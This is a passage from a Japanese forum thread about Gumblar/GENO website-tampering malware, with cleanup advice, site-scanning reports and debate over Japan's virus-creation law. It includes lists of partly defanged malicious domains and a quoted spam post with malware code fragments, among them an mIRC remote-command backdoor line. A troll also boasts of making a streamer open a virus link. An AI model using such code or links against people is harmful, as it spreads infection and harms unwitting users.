このバージョンじゃないけど、ぜいじゃく性を悪用する処理を
積んだExploitKitが存在するから、入れてるPCは更新必須

>>600
1月に書かれた記事でもう古くて不完全な情報だよん

AdBlockは単に"軽減"という程度のレベル
改竄されるのは何も広告だけでないし
範囲も限定的で、たとえばメールとかIM経由なら出る幕がなし

基本的な対策は>>2-3
これ以上もこれ以下もないん (ゼロデイ攻撃は除く)

とりあえずどっかのサイト行く前に必ずセーフブラウジングに掛ける癖を付ければ良いんじゃないかな

>>606
そんな面倒な事するくらいならGoogle Chrome使えよｗ

そんなのじゃ無理
Secure Browserが良いよ

>>606
そのセーフブラウジングも「Google は過去 90 日の間、このサイトを巡回していません。」
という場合があるよなw

やっぱりこの場合はは危険かどうかわからないってことなのかな？

OCNからメールが。
自分のWEBサイトがガンブラーに感染してると。
調べてみたらひとつ怪しいファイルがあったので削除。
Windowsのアップデート〜adobe関係までアップデート。
ウイルスソフトでウイルスチェック。
WEBホストのパスワードをすべて変更。

嫌気が刺したんで他のWEBアカウントデータもすべてホスト側から削除。

これでよろしいでしょうか？

webサイトを閉じる。
PCリカバリ。

>>610
> 調べてみたらひとつ怪しいファイルがあったので削除。
このファイルはどうやって持ち込まれたと思ってるの？
それに対する対策はしたの？

クリーンインスコした方が…

>>611
サイトは自分のPCが完全にクリーンな状態になるまで完全閉鎖

感染が疑われるPCは、HDを他のPCに繋いで検査すること
他のPC〜ができないなら迷わずリカバリ

PCがキレイになったら、>>2-3を実施(ずっと継続する)＋パスワード変更とか・・

サイトのトップページに【お詫び】を掲載
※閲覧者に対して、感染の有無の確認(ウイルススキャン)をお願いする

>>610
早くHP閉鎖しろカス！！！！！！！！！！！１

>>610
HTMLファイルは手元のファイルとサーバー側で変更がないかちゃんと確認した？
Javaランタイムはアップデートした？
他のすべてのインストールソフトに対してアップデートを確認した？
OSわからんけどWindowsUpdateじゃなくMicrosoftUpdateでやった？
Webアカウントにはフリーメールも含まれてるわけだけどそのへんもパス変えた？
LAN内に他にPCはないの？

ウイルスでウイルスチェックしても意味ないよ
セキュリティ対策ソフトが入ってるなら期限が切れてないことが大前提

情弱の不幸でﾒｼｳﾏ

ガンブラーに感染しちゃったら、上の方にあった対処法に従ってやるんだろうけど
クリーンインストールやってもだめなんじゃないの？

Cドライブにシステム、データ他はパーティション切るか
別ドライブで「D」以降にって人が多いと思うけど
システムドライブだけきれいになっても
データドライブにWEBのファイルがある人は、
そのドライブに改鼠されたデータが残ってたらどうなるの？

毎回再インストール
これ最強 しかしHDDがそのうち物故割れるという諸刃の刃

>>618
サーバー側のデータをFTP経由で改竄してるだけだよ
もしローカル側のデータを改ざんされたとしてもそれはバージョン管理ソフトや
バックアップとの差分を見ればわかるとおもう
そういうのがないなら入念に確認して下さいとしかいえん

万が一改ざんデータがローカルに残っててもそれだけではどうにもならない
アップロードされ直してその後も動く状況なら被害者が増えるだけ

>>619
そういうの関係なく壊れるときは壊れます

まだ個人のブログなら改ざんされても見ている人からも報告があるだけ良いな
企業のサイトなんかは連絡しても「何それ?」って返ってくるし

>>620
ローカル保存のHTMLも改竄って記憶があるんだけど、これじゃなかった？

>>610
うーん、できれば感染していた時のaguseの結果が見たかった

マスターペニス

詳しくことはよくわからないけど
puredress●com

ttp://www.zilbe.com/source/
ニュー速運用情報から http://抜きだとエラー

これ良いなｗ

プロセルピナ・プロジェクト
ttp://www.traceability-center.com/proserpineProject.html
試用版＝無期限(一部機能に制限あり)

「プロセルピナ」のAntiAd機能をテストするためのテストページ
ttp://sound.jp/antilink_testpage/cut_jscript_includingEval.html

Google、改ざんされた疑いのあるページに検索結果で警告表示
ttp://internet.watch.impress.co.jp/docs/news/20101220_415942.html

マスターペニス

今youtubeをaguseで見る限りヤバくね？
s0.2mdn●net/879366/flashwright_1_2●js
という奴が見つかるのだが

間違えた、訂正します
s0.2mdn●net/879366/flashwriht_1_2●js

>>631
404

度々すまない
また間違えた
aguseで見つかったのはこれです
s0.2mdn●net/879366/flashwrite_1_2●js

>>633
どこがヤバイの？

中身を見てもどこかに飛ばされるようでもないし
VirusTotalでも問題ないようだがな
ttp://www.virustotal.com/url-scan/report.html?id=25c8407eea8955f8d55d2e54129e10fe-1293018038
ttp://www.virustotal.com/file-scan/report.html?id=ecd3969cd8b93aa0fab45d1b054866f0342109aec1e41bd2d39575460ec5b1f0-1293021846

>>634
『s0.2mdn.net/879366/flashwrite_1_2.js』でググってみると
なんだか危険そうな雰囲気なんだが…

URL手打ちなんてかわいい

>>630-636
これかにゃ？
ttp://forums.liveleak.com/showthread.php?p=882808
>well if you are quick and crank up fiddler and check any of the the flash links
listed at the top out then you will note that a script file from ｈｔｔｐ://s0●2mdn●net/879366/flashwrite_1_2●js
is loaded up and this script includes a function called dclkFlashWrite that simply does
a document.write(script string) that redirects to pre-loader.
(以下略

So-netのセキュリティ通信のサイトって無くなった？
数日前に突然消えて、恐くてアクセス出来ない・・

普通に見られるよ。更新中だったりしたんじゃないの?

>>640
ありがと。

怖くてアクセス出来ないってかわいいな(笑)

俺様にウィルス踏まされて怒り狂ってる低脳どもざまあだな
そしてこのスレURL晒しながらも悪用厳禁とか書いてる奴は本当に矛盾してて頭悪いな

(�Vд�V)♪

いくらネットの法律改正しても
俺様はまだ一度も逮捕されてないお(�Vд^)-☆調子に乗り乗りですお！

相手にされてねえｗ

VIPに釣りリンク貼ってスクリプトでリモホ抜いたりしたことはあるが
他人にウイルスは踏ませたことがないな

>>645←
↑

ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1352734298
現在知恵袋では新手の偽セキュリティソフトが大流行していると
各自別IDも総動員して書き込みしてる有名な一派がいるんだけど
ほんとにこいつらがこんなに大騒ぎするようなこと現在起こってるの？

真偽はともかくスレ違いだろ

>>648
そんなリンク見る気にもならないけど実際に発生しているのは事実

>>648
そのグループ回答者たちの各回答見ると「○○さんの〜」みたいに自分たちが発見・紹介してる
みたいな記述してるのが笑えるし少し引いたｗ
各質問に回答してる解決法もいかにも自分たちだけができるみたいな書き方だしｗ
別にそんな回りくどいやり方殊更偉そうに別IDまだ作って宣伝しなくても
さっさとバックアップしてリカバリすればいいだけの話じゃねぇ？

>>648
何このキチガイ
これ全部一人の自演？

Security Tool から Security Shield になったみたいね

>>648
改行厨にアフィアドレス誘導ワロタ

>>648
何が最敬礼だよ
キモ過ぎる

マスターペニス

MSEに似た偽セキュリティソフトもあるから具体的な名前すら
出さない注意喚起なんてチェーンメールのデマみたいだ。

ttp●//www●mypondstore●com/?q=on-line_scan

aguseでクロ判定

uemura-bokujyo●co●jp

www●ropponngi●com
www●soyo-pet●com
www●trickys-custom●net
oak-co●net
www●himawarinosato●or●jp
www●soyo-pet●com
www●ltsgo●co●jp
interior-myhouse●com
/royal-cbj●jp
www●paohouse●co●jp
www●yamaharu-tosou●co●jp
motif●jp
satokk●co●jp

>>628
今日知った。google先生さすがだぜ

Gumblar/8080系再始動？
ttp://www.google.com/safebrowsing/diagnostic?site=addonrock●ru&hl=ja
>Google が最後にこのサイトを巡回したのは2010-12-30で、
このサイトで不審なコンテンツが最後に検出されたのは2010-12-30です。

addonrock●ru/(省略)●jsを突いてみた
日本からのアクセス→まったく繋がらない(IP変えても×、国内の串を通しても×)
海外の串→繋がることがあるがファイルは落ちてこなかった
※2回目以降のアクセスは404

Gumblar(.x/亜種)と同じくGeoIPで国ごと蹴ってるのかね？

作戦通り♪

(�Vд�V)FF14のニコ生でブラクラ踏ませてきた
http://live.nicovideo.jp/watch/co473160

FF14実況中の馬鹿にウィルス入りのブラクラ踏ませた
↓
そのショックで主のPC固まる&主の精神も固まり中
↓
最初は主をフォローしてたリスナーも飽きて他いった
↓
放送の延長(有料)が自動で行われてること判明
つまりPC固まってるのに有料の延長が無駄に使われて生主涙目状態←今ここ


(�VД�V)ざまああああああああああああああああああ！！！！！！
でへへへ、俺様マジGJでしょ(*�Vд�V*)

>>663 死ねよ

やべぇ…これってGumblarじゃないよな？
ウェブメール使おうと今日見たらこんな風に…。

aguseでは反応無かったし、大丈夫だと良いんだが…。

ttp://exout.net/mail/

>>663
分かったからコテかBeつけて書き込んでよ

>>663
これを見ていた人はウイルス対策の必要性を思い知っただろうな
いつの日かこのような悪事をはたらいても無意味になることを祈ろう

ニコ動利用するときにはメアド取得必要だし
被害届けとかも出せるんじゃない？例え捨てアカでも

マスターペニス

>>665
>>1読めカス

(�VД�V)ムハハハハハハハ！
無知が多くて笑えるな(＞ｗ＜)新年早々上機嫌お☆

>>664>>666-667>>668
ほれ見たことか！
そうやってコテに反応するからまたコテの思い通りになってんだろ！死ね！！！

MSTMP.EXE
とnet-worm.kidoもはやってるよ
ネットワームはkk.zipで駆除できる
http://support.kaspersky.co.jp/faq/?qid=193238801
実はmstmpに感染してたんだ
タスクマネイジャーを起動
プロセスにmstmp.exeを停止
アンチでブート検査、ルート検査を実行

>>673
説明下手だなおい

673みたいにコミュニケーション力が駄目な奴は文章化しても駄目なんだよ
そういう同僚とたまにメールしてるからよくわかる

まあダメな奴ほど自分がダメだって気付かないからな

すごいな
自分の中で勝手に完結しててまったく説明になってない素晴らしい例だ
こういうのって脳の障害じゃないのかな
新年早々良いものを見ることができて感動した

むしろ、ここでURLの解説してるのって頭が悪い奴ばかりだろ
過去に俺様が指摘したような
悪用厳禁と書きながらhと.だけ外しただけの危険URLひたすら貼ってる馬鹿とか
ウィルス入りサイトのURLを故意に踏ませたら逮捕されるとか思っちゃってる哀れな無知とかな

┐(�VД�V)┌ 偽善者ほど醜いものはねーぜ！
んな中途半端なことしてねーで、どうせなら悪用推薦！って書くようするか、死ね！

ウィルスといえば
最近、朝起きると
とても高濃度な痰が出る
恐らくウィルスが含まれているのだろう
それを10階のベランダから吐くのがすっかり日課になってる

何が言いたいのかというとだ
俺様はウィルスを踏ませることもあれば降らせることも・・ｒｙ

Σ(�VД�V )＼(＞ｗ＜)ったねぇよ！

おW
680じゃん
数字の8が大好きおヽ(�Vд�V)ﾉおっおW

>>679
やべ・・ちょっと面白いと思っちまったじゃねーか！
高速道路でコンクリート上から落としてきた！って書いたら通報もんだけど
痰の場合はどうなんだろうなｗｗｗｗ

マスターペニス

>>681
たんじゃなく精子だったら通報だろ

こういうクソコテがある日突然音沙汰なくなったりするんだよな
面白いなあ

4 ：ｚ：2010/08/28(土) 10:25:02 ID:NtVfNVmU0
452 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:53:49.30 ID:7Cr427LS0
>>440
・プロバイダの新しい有料メールアドレス
・ジャパンネットバンク銀行の使い捨て番号のVISAデビット
ニ.フ.ティ.ーの100円のメアドプラスで認証が通った。
認証できたら、メアドプラスは登録解除してOK。
普通のクレジットカードでは漢字の住所が登録できたが、
ジャパンネットバンク銀行のVISAデビットだとローマ字入力の住所を要求された。

ローマ字の書き方はこれ
ヘボン式ローマ字綴方表
http://www.seikatubunka.metro.tokyo.jp/hebon/

漢字住所でどんな順序でどんなローマ字、番地の番号を使ったかは、
メモ帳でメアド・パスワードと一緒に控えておいたほうがいい。
453 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:55:00.00 ID:t966sYmN0
ローマ字変換
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
http://www2u.biglobe.ne.jp/~yuichi/rest/kanarome.html
454 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:56:54.59 ID:qfPgiwgp0
●買うなんて荒らしと一緒だぞ
455 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:58:50.21 ID:d455Pgrw0
荒らしが運営に喧嘩売っても被害を被るのは巻き添え食らってる人だけっていう…
荒らしたもん勝ち
456 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:58:54.30 ID:sPPrGi160
荒らしが●を買ったんだとしたら、個人情報登録してるんじゃないのか？
それで同一名義のアカウント全部停止するとか、
新たに買おうとしてきても拒否するというのはできないんだろうか？

擁護認定の流れが始まるのか
胸薄

(�Vд�V)お前ら煽りに耐性ねーのな
自分で言うのもなんだけどコテにも耐性ねーだろお前ら
俺様の狙い通りの反応なんだもーん♪(�Vд�V三�Vд�V)だもーん♪
気持ち悪いPCおたくでしかもおっさんなお前らだからしゃーないか(＞ｗ＜)ﾌﾟｸｽｽｽｽwww

>>688
(＞ｗ＜)8が二つで！ラッキーん☆

88をゲットしたので久々にこの顔登場

　　　　 　∞
　　　8�Vд�V8 !?

NHK教育 23:30
ITホワイトボックス2選 脅威ガンブラーウイルスの正体▽感染拡大の謎▽対策は?

株式会社GENO - ECサイト運営スタッフ募集
http://www.find-job.net/list/j83468.html?from=23

汚染を除去しました。

やめろや

★110112 news ウイルスコード「Scriptini」マルチポスト荒らし報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1294815235/

ソースコード流出の件でウイルスコード等の書き込み制限機能を止めてるんだな

ダンさん落ちてる。。。orz....

2chハックの件以降、キチガイを見ないな…

Gumblarももう終わりか、つまんないな

あるっぽい。
Received 2011-01-19 11:54:20
JSUNPACK
8fa8604f9abcf13ca0abe8775cdad54cad50d4a1


VIRUSTOTAL順番待ち7000番台ってどーよ。。。

てす

>>698
malware作者が妨害のためにゴミ投げまくったんでしょ

ウイルスサイトのURL貼ってくんない？
まぢウイルスかかってみたいんだけどさぁ www

>>701
ttp://www.mhlw.go.jp/bunya/kenkou/kekkaku-kansenshou01/index.html

643 名前：名無したちの午後[sage] 投稿日：2011/01/25(火) 04:49:34 ID:ATQNV0HP0 [1/5]
1・24学習会　私たちの言論・表現活動の自由が危ない！
すべてのインターネット通信が監視される？
「コンピュータ監視法」とは何か
なぜ、ウィルス作成罪・コンピュータ監視法に反対するのか
　法務省は、今通常国会にウィルス作成罪をふくむコンピュータ監視法を提出しようとしています。
　共謀罪は法律に違反することを実際に行わなくとも、話しあうだけで処罰するものですが、
コンピュータ監視法の中のウィルス作成罪は、同じようにそれが使用もされていない、ウィルスかどうかもわからないプログラム作成の段階で処罰しようとするものです。
そのためには、インターネットによる私たちの通信のすべてが監視されることになるでしょう。
共謀罪とコンピュータ監視法は、いずれも言論・表現行為の段階で、市民に対する監視を強め、規制しようという狙いで一致しています。
コンピュータ監視法には、捜査当局が裁判所の令状もとらずに、プロバイダーなどにパソコン、
携帯電話のメールやホームページへのアクセスなどの通信履歴を90日間保全要請できるという規定もあります。
　コンピュータは現在市民にとって必要不可欠な通信手段となっています。
この法案ができれば、通信の秘密が侵害され、市民の自由な言論・表現
　活動が規制されて、民主主義を危うくするでしょう。
　学習会で詳しく学び、コンピュータ監視法の国会提出に反対しましょう。お誘いあわせてご参加ください。
■と　き　1月24日（月）午後6時30分〜
■ところ　かながわ県民センター７０９号室
（横浜駅西口から徒歩５分、ヨドバシ・カメラ裏）
地図　http://www.pref.kanagawa.jp/osirase/02/0051/center/access.html
■お話し　山下　幸夫さん（弁護士）
「なぜ、ウィルス作成罪・コンピュータ監視法に反対するのか」
■参加費　500円
■主　催　盗聴法に反対する市民連絡会
連絡先　日本消費者連盟　Tel.03-5155-476 5
ネットワーク反監視プロジェクト　Tel.070-5553-549 5

644 名前：名無したちの午後[sage] 投稿日：2011/01/25(火) 04:49:58 ID:ATQNV0HP0 [2/5]
110124コンピュータ監視法学習会
iwakamiyasumi on USTREAM: フリージャーナリスト・岩上安身が、どこにでも出かけて、誰にでも取材し、可能な限り、ダイレクトに情報をお伝えします。インタビュー、対談、記者会見、などなど。. ...
http://www.ustream.tv/channel/iwakamiyasumi
【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月) | PortSideStation
http://portside-station.net/2011/01/23/6859/
Togetter - 「コンピュータ監視法学習会tudaりまとめ」
http://togetter.com/li/92712
神奈川県横浜市神奈川区鶴屋町2-24-2 - Google マップ - かながわ県民センター
http://maps.google.com/maps?ja&channel=suggest&q=%E7%A5%9E%E5%A5%88%E5%B7%9D%E7%9C%8C%E6%A8%AA%E6%B5%9C%E5%B8%82%E7%A5%9E%E5%A5%88%E5%B7%9D%E5%8C%BA%E9%B6%B4%E5%B1%8B%E7%94%BA2-24-2

第171回国会 議案の一覧
http://www.shugiin.go.jp/itdb_gian.nsf/html/gian/kaiji171.htm
法務省：第１６３回国会（特別会）提出主要法律案
http://www.moj.go.jp/houan1/houan_houan34.html
法務省を対ウイルス法案で突っついてみました
http://angels-pathway.clanteam.com/qa_houmu_antiviruslaw_100818.html

サイバー犯罪条約
http://www.mofa.go.jp/mofaj/gaiko/treaty/treaty159_4.html

|1・25コンピュター監視法学習会のご案内
|カテゴリ : 監視社会
執筆 : toshi 2010-1-6 3:32

　以下のような学習会を開きます。東京都がネットカフェ規制の強化を条例化しようとするなど自治体レベルでのネット監視がじわじわと進んでいる。
コンピュータ監視法案は共謀罪とともに繰り返し廃案になっているが、共謀罪ほど反対運動の焦点にはなってこなかった。
しかし、民主党政権はとりあえず共謀罪については、法案の提出の動きは見えないが、
コンピュータ監視法案は共謀罪から切り離しての提案もありえないわけではない。油断は禁物というのが現状だということを知ってほしい。

1・25コンピュター監視法学習会のご案内

コンピュータの規制が犯罪対策を理由に年々強化されてきています。こうした
動きを一挙に加速させると考えられているのが、サイバー犯罪条約批准のため
の国内関連法の整備を理由としてだされたコンピュータ監視法です。
コンピュータ監視法の性格は、共謀罪新設法案とともに一体のものとして「刑
法等の一部改正案」としてだされたところに鋭く示されています。
いまやコンピュータは市民の日常生活にとってなくてはならない通信手段です。
サイバー犯罪対策の名の下にコンピュータへの監視・規制を強めようとするコ
ンピュータ監視法の制定を許してはなりません。
同法は、現在共謀罪新設法案とともに廃案となりましたが、法務省などの同法
推進派が条約の批准を理由にいつ上程してくるかはわかりません。
サイバー犯罪条約とは何か、コンピュータ監視法とは何か、学習会を開きます。
ぜひ、ご参加ください。

652 名前：名無したちの午後[sage] 投稿日：2011/01/25(火) 05:34:58 ID:ATQNV0HP0 [4/5]
>>645
と　き　　1月25日（月）18時40分〜21時
ところ　　ピープルズ・プラン研究所会議室
(東京都文京区関口1-44-3　信生堂ビル２Ｆ
Tel:03-6424-574 8　地下鉄有楽町線江戸川橋駅1B出口徒歩5分)
　　　　　http://maps.google.co.jp/maps?hl=ja&utm_source=ja-hp
お話し　山下幸夫さん（弁護士）
　　　　「サイバー犯罪条約とコンピュータ監視法」
　　　　小倉利丸さん（富山大学教員）
　　　　「コンピュータ監視法の問題点」
参加費　500円
主　催　盗聴法に反対する市民連絡会
連絡先　日本消費者連盟　Tel.03-5155-476 5
　　　　ネットワーク反監視プロジェクト　Tel.070-5553-549 5
・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・
コメント (0)トラックバック (0)閲覧 (405)

no more capitalism - 1・25コンピュター監視法学習会のご案内
http://alt-movements.org/no_more_capitalism/modules/no_more_cap_blog/details.php?bid=13
東京都文京区関口1-44-3 - Google マップ - 信生堂ビル２Ｆ
http://maps.google.com/maps?ja&channel=suggest&q=%E6%9D%B1%E4%BA%AC%E9%83%BD%E6%96%87%E4%BA%AC%E5%8C%BA%E9%96%A2%E5%8F%A31-44-3

653 名前：名無したちの午後[sage] 投稿日：2011/01/25(火) 05:37:53 ID:ATQNV0HP0 [5/5]
日曜日, 1月 23rd, 2011 | Posted by KIMURA
【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月)

http://www.ustream.tv/recorded/12218086

　ジャーナリスト岩上安身さんのスタッフが生中継を行いました。
　流れとしては、
「犯罪の国際化及び組織化並びに情報処理の高度化に対処するための刑法等の一部を改正する法律案」（通称コンピューター監視法）が提出され、
可決を契機に、現在日本は批准していない国際的なテロ防止と称して情報通信を監視する「サイバー犯罪条約」に批准することが考えられ、
さらに批准を契機に盗聴法改正まで行われるのではないかという見解がある。
広く考えると、憲法によって守られている通信の秘密や表現の自由までも国家権力が脅かしうるという、危険な状況で、
さらにこの法改正を理由に憲法の解釈を変えたり、場合によっては憲法改正までもが行われるのではないか、とも言われている。
　日弁連を中心にこの「犯罪の国際化及び組織化並びに情報処理の高度化に対処するための刑法等の一部を改正する法律案」を廃案にするための動きが起きている。
　もしもこの法改正が進めば、インターネットや携帯電話による市民の情報通信は常に監視されることになるだろう。
警察による通信履歴の検閲や、コンピューター上でのプログラミングすらも、ウィルス作成罪にあたるとして取り締まることが可能になる。
　盗聴法<組対法>に反対する市民連絡会では、プライバシーを侵害し、表現の自由を規制する盗聴法の廃止を求める市民団体共同声明に賛同を募っている。　http://www.anti-tochoho.org/ut/ss20100201.html

　資料としてこちらのHPを一緒にご覧ください。

　コンピュータ監視法に対する疑問（盗聴法<組対法>に反対する市民連絡会 ）
　http://www.anti-tochoho.org/ut/gg20101214.html
　サイバー犯罪条約 http://www.mofa.go.jp/mofaj/gaiko/treaty/treaty159_4.html
　日弁連が提出したサイバー犯罪条約への意見書 http://www.nichibenren.or.jp/ja/opinion/report/2004_23.html


【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月) | PortSideStation
http://portside-station.net/2011/01/23/6859/

総務省のインフルエンザのページ貼ったらファビョってしまったようだ
すまない

これなんだ？

analyzer5.fc2.com:8080/ana/processor.php?uid=107662

analyzer5.fc2.com:8080/ana/analyzer.php?uid=107662&pid=0&idsess=&ref=&href=http%3A//zbrjinsoul4.web.fc2.com/&wid=1024&hei=1024&col=24&visitor=1-1642776976-1296198419-0-1-1-0

FC2のアクセス解析だろ

fc2のアナライザーはadblockなんかでブロックしても特に問題ない

>>710
お前さんがFC2アクセス解析が入っているページ(主にFC2ブログ)にリンクを貼った
↓
そのサイト主がFC2アクセス解析を見てリンクを辿った
↓
それがお前さんのサイトのアクセス解析に残った

そんだけ
鑑定は他でやれ

ブラウザを見ただけでボットに感染することってありますか？

>>714
感染した感じがしたら、もう掛かってますw

>>714
どこからここにたどり着いちゃったの？
素人をアピールすることに何の意味があるの？
ブラウザを見るってのは実行ファイルを見るってこと？
ファイル見ただけじゃ感染しようがないでしょ

オミトロンに登録した古いGenoウイルス警告スクリプトがこのサイトに反応した
www●no-review●net/
Javaスク切った状態でアクセスしてるから異常は無いと思うんでウイルスチェックはしてない。
みんなはどう？

>>716

最近活気無いなあ
そろそろいいの？

>>717
いろいろアレだけど
JavaScriptオフで防げないのもあるから注意してね

【AV女優】晶エリー（大沢佑香）の公式サイトがGENOウイルスに感染中！
http://hato.2ch.net/test/read.cgi/news/1296896238/

>>721
ソース見たけど1行目からロシア行こうとしててすごくおろロシア
末尾にもあるね

>>721
whoisでぬるぽ完了。

>>721-723
消滅じゃなくて戦略的撤退だったのね･･

改竄祭絶賛開催中
isawa-crystal●com/
ソース見てワラタ

>>724
ひどすぎて吹いた
danさん経由なのにAviraが怒り出すしひどい

>>724
乙
whoisからメルかんりょ

>>726 乙

どっとこむ8080装填中
club-garcons●com/

>>727
banana3306●maido3●com
う〜む。。。

>>727
いちおメルすた。
連絡先がドコダなので蹴られている可能性大。。。

http://qb5.2ch.net/test/read.cgi/sec2chd/1296394964/366

システム復元で偽セキュリティを駆除できると思ってる大馬鹿者が急増してるなｗ

VTがおかひいお。。。

(・肉・) ﾄﾚﾄﾚﾋﾟﾁﾋﾟﾁｶﾆﾘｮｰﾘ♪

JSUNPACK
6e2cf8ebd8635107d4e26b2861c3a26cf4073e14

みん(なあたま)カラ(っぽ)とは良く言ったもんだｗｗｗ
ttp://minkara.carview.co.jp/userid/361321/blog/21640486/
ttp://minkara.carview.co.jp/userid/361321/blog/21668229/

【セキュリティの強化】って、具体的に何をすれば良いのかブログ書いてくれよｗ

>>734
こりか。。。

壁紙を変更する偽セキュリティソフト、国内で感染報告が増える
http://internet.watch.impress.co.jp/docs/news/20110307_431684.html
http://jp.trendmicro.com/jp/threat/security_news/monthlyreport/article/20110304050209.html

>>734
自分で燃料投下して逆ギレとか、どんだけバカなんだよｗｗｗｗ

!ninja

>>734
>たぶん、セキュリティがちょっと低く設定されていたか
>ＪＡＶＡが最新でなかったのが原因で入り込まれたとか考えられるそうです。
>ウイルスバスターも強制終了ｗｗ
>エ○サイトのURLはLunascapeに登録していたので消えましたがｗｗ

ユーザーのセキュリティー意識が低ければ
糞の役にも立たないウイルスバスターにワロタ

>>738
それはなんでも同じじゃね
ユーザーが全て許可をしてしまえばおしまい

無知は怖いよ。

アメーバピグのFlaｓｈのバージョンアップで運営ブログが炎上したのだって
未だに平気でVer9を使っている連中が原因だぞ。

>>739
ウイルスバスターは、低次元な広告を見てもアホユーザーがメイン対象にもかかわらず
そのアホユーザーには効果がないなら、存在が無意味だろうし
アホユーザー前提に設計したほうがいいと思うのよね。

許可するシーンで
例のヤクザ坊主が出てきて、しつこく何度も脅すとか
例の女が発狂しているシーンが出てきて、JAVAのアップデートを促すとかｗ

ドライブバイダウンロードを喰らうバカに多いパターン

１：「○○(セキュリティソフト)を入れてるから大丈夫」と豪語している

２：全てをセキュリティソフトに依存しているため、
地雷(DBD)を踏むと高確率で感染する

３：「○○入れてたのに感染した(怒)」と、セキュリティソフトに文句を言う

４：必死になって駆除方法を捜して駆除は行うが、
感染原因を知ろうとしない為、根本的な対策ができない(駆除方法と一緒に書いてあっても一切見ない)

５：２に戻る


セキュリティソフト依存症は病気(精神疾患)ですよｗ

依存してるんじゃなくて何も知らないだけってのもある
セキュリティソフトも偶然入ってるだけで場合によっては期限切れ

>>741
たしかにそうだね
たとえ誤爆してでも初心者ユーザーには選択肢を与えないほうがきっと安全
バスターが把握していないものは許可しないとかそういうモードをつけてもいいかもしれない
どうせ初心者なら使うソフトも限られてるだろうし

「ウイルス作成罪」新設、提供・取得・保管も 改正案閣議決定
http://raicho.2ch.net/test/read.cgi/newsplus/1299802224/

これからは故意でなくても脆弱性を修正しないで放置して
Gumblarようなウィルスの踏み台にされた時点で逮捕されるわけだな。

>>744
>作成罪に加え、提供、取得、保管などの罪を新設。

マルウェアの取得が違法
↓
ベンダーに検体が提出されない
↓
極地的に流行るマルウェアに対応できず、感染PCが急増
↓
感染したPCを所有する者は容赦無く逮捕
↓
罰金(30万円以下)と、証拠品として押収したPC(クリーニングされた後、中古品として販売)でガッツリ稼ぐ


さすが欠管政権ｗ
穴だらけなのに隙が無いなｗｗｗｗ

記事には書いてないけど、提供・取得・保管が罪になるには前提条件があって
他人のPCを感染させる目的の場合らしいよ

>>745
辞民党は何もしてこなかったけどなｗｗｗｗ

>>747
法案自体は，2004年2月の第159回国会で閣法（内閣提出法案）として国会に提出されました。
とあるので、何もしてこなかった訳ではないらしい

ウイルス作成罪はいつになったら成立するのか
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20061201/255707/

ウイルス作成罪新設　刑法改正案、サイバーテロに厳罰 2011/3/11 8:43
ttp://www.nikkei.com/news/headline/article/g=96958A9C93819481E3E3E2E2EB8DE3E3E2E1E0E2E3E3E2E2E2E2E2E2

> ウイルスの取得や保管も罪になり、２年以下の懲役または30万円以下の罰金。
> 対策ソフトの開発などが処罰対象とならないよう、
> 処罰の要件に「正当な理由なく」との表現を盛り込んだ。

> ウイルス作成罪創設の改正案提出は自公政権当時から３回目。

お、停電復帰したようですね貴方

Flash Playe 10.2.153.1
http://www.adobe.com/jp/software/flash/about/

>>721-722
すまない、いったいどんなソースコードがあったんだ?

>>752
だいたいいつものやつだよ

（�Vд�V）の俺様ブログ -顔文字の俺様ブログ-
ttp://ruhuraro.blog57.fc2.com/
>このページの表示は許可されていません
>このブログは下記の理由などにより凍結されています。
>* 規約上の違反があった
>* 多数のユーザーに迷惑をかける行為を行った。

震災の記事の件で通報したら消滅すたｗ

>>754
http://megalodon.jp/2011-0322-0049-18/ruhuraro.blog57.fc2.com/blog-entry-347.html
これか？

>>755
こりゃ凍結されても仕方ないわｗ

>>755
閲覧を観覧と書いちゃう男の人って…

>>754-755
ttp://ameblo●jp/ruhuraro/entry-10847321466●html
>(�VД�V)┌ んなことよりfc2でやってる俺様ブログがなぜか凍結されたぜ
>ｌ(�VД�V)ｌ一体、この俺様が何をしたというのかあぁぁぁぁああああ！！！！
>(�Vд�V )震災をネタにしすぎたかしらん♪ちょっぴ反省w

反省しなくて良いからさっさと氏ねよ

http://www.google.com/search?num=100&q=lizamoon%2Ecom%2Fur%2Ephp

「ウイルス作成罪」盛り込んだ刑法改正案、国会に提出
http://hatsukari.2ch.net/test/read.cgi/news/1301929633/

新型SQLインジェクション攻撃「LizaMoon」多発〜日本でも改ざん例を確認
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2539

http://www.google.co.jp/webhp?sa=N&hl=ja&tab=lw#hl=ja&source=hp&biw=1396&bih=763&q=http:%2F%2Flizamoon.com%2Fur.php&btnG=Google+%E6%A4%9C%E7%B4%A2&rlz=1R2ADBR_ja&aq=f&aqi=&aql=&oq=http:%2F%2Flizamoon.com%2Fur.php&fp=ff099f39f2c306f8

Wo[BLOCKED]ks.com/ur.php
al[BLOCKED]ne.com/ur.php
al[BLOCKED]er.com/ur.php
li[BLOCKED]on.com/ur.php
t6[BLOCKED]56.info/ur.php

【Gumblar/GENO】Web改竄ウイルス総合10【8080】
http://hibari.2ch.net/test/read.cgi/sec/1279692828/

>>751
10.2.159.1

!denki!ninja

ほんまにわらかしてくれる
無菌状態にしようとするからいたちごっこになる
ゾンビの体でなにが来ても復活できるようにすれば問題なくなる。
仮想環境はもっと使いやすく作れるだろに
セキュリティ産業をすぐにすたれさすのはもったいないと言って
作らない。

>>751
10.3.181.14
http://www.jpcert.or.jp/at/2011/at110013.txt

test

JSUNPACK
> MySQLdb error
orz...........

JsunpackがトンだらとりあえずWepawet使えって爺ちゃんが言ってた

>>771
今流行のSEOポイズニングっての突っ込んだら固まったお。。。

Wepawetはすげー時間かかるよ

